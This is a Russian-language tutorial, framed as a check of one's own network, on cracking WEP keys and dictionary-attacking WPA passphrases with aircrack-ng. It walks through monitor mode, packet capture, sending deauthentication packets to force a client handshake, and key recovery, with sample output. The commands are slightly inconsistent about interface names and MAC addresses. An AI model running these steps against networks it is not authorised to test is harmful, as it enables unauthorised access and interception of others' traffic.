Инструкция по подбору ключей шифрования в беспроводных сетях, базирующихся на
механизме WEP, являющемся устаревшим, но продолжающем широко использоваться.
Данная информация предназначена только для ознакомления и может быть
использована исключительно в целях проверки надежности собственной сетевой инфраструктуры.

Устанавливаем пакет AIR Crack.
В Debian/Ubuntu:

   $ sudo apt-get install aircrack-ng

В Fedora/CentOS/RHEL:

   $ sudo yum -y install aircrack-ng

Определяем сетевой интерфейс, привязанный к беспроводной карте:
2. Identify wireless network interface

   $ /sbin/iwconfig

   wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm

Активируем режим мониторинга:

   $ sudo airmon-ng start wlan0

   Interface       Chipset         Driver
   wlan0                   rtl8180 - [phy0]
   (monitor mode enabled on mon0)

Определяем BSSID-идентификатор сети:

   $ sudo airodump-ng wlan0

   BASE:
   BSSID : 00:0F:B5:FD:FB:C2
   Channel: 6
   STATION:
   MAC: 00:13:04:30:FA:EC

Для успешного проведения атаки к точке доступа должна быть подключена хотя бы
одна активная машина, чем больше трафик у которой, тем быстрее будет подобран ключ.

Включаем режим снифинга и накапливаем статистику. Чем длиннее WEP-ключ тем
больше пакетов необходимо перехватить (64-битный ключ требует накопления
примерно 6000 пакетов):

   $ sudo airodump-ng -c 6 --bssid 00:0F:B5:FD:FB:C2 -w data-capture wlan0

где, "-c 6" - номер канала беспроводной точки доступа (см. вывод airodump-ng
wlan0). В опции --bssid указан идентификатор точки доступа, для отсеивания
лишнего трафика. Все перехваченные пакеты будут сохранены в файле data-capture-01.cap.

После накопления достаточного объема статистики подбираем WEP-ключ (выполняем
операцию не прерывая процесс снифинга, так как числа перехваченных пакетов
может не хватить):

   $ sudo aircrack-ng -z data-capture-01.cap

   Opening data-capture-01.cap
   Read 450 packets.

   #  BSSID              ESSID                     Encryption
   1  00:11:95:35:FD:12  test1                WEP (210 IVs)
   2  00:17:3F:62:2E:50  test2                None (0.0.0.0)

    Index number of target network ? 1

   [00:00:21] Tested 485 keys (got 17690 IVs)

   KB    depth   byte(vote)
    0    9/ 13   00(20993) 06(20737) 27(20736) 3F(20736) A2(20736)
    1    0/  1   F3(28417) A8(23298) 34(21248) 57(21248) A3(21248)
    2    0/  2   8E(25857) BC(23809) 3F(23040) D2(22784) 69(21504)
    3    0/  5   6E(24321) 35(2259) 5A(22016) 95(22016) B8(22016)
    4    3/  4   98(21505) 7C(20993) 84(20992) E0(20992) F0(20992)

   KEY FOUND! [ 1F:F3:6E:6A:98 ]
   Decrypted correctly: 100%

На выходе получили искомый ключ "1F:F3:6E:6A:98".


Подбор простого словарного pre-shared WPA-ключа.

Похожим образом осуществляется подбор WPA-ключа, только для успешного
завершения подбора требуется значительно больше времени и определенное везение.

После запуска  airodump-ng дожидаемся соединения клиента к сети:

   CH  6 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
   ...
    BSSID              STATION            PWR  Lost  Packets  Probes                                             
    00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116  

После чего инициируем деаутентификацию клиента:

   $ sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

   11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

где, 1 - число отправленных deauth-пакетов, 00:14:6C:7E:40:80 - MAC точки
доступа, 00:0F:B5:FD:FB:C2  - MAC клиента.

Запускаем процесс подбора ключевой фразы по словарю password.lst.

   $ aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 data-capture-01.cap

В случае успеха получаем примерно следующее:
 
   BSSID              ESSID                     Encryption
    1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)
   
   Choosing first network as target.
   ...
   [00:00:00] 2 keys tested (37.20 k/s)
   KEY FOUND! [ 12345678 ]
 
   Master Key     : CD 69 ...
   Transcient Key : 06 F8 ... 
   EAPOL HMAC     : 4E 27 ...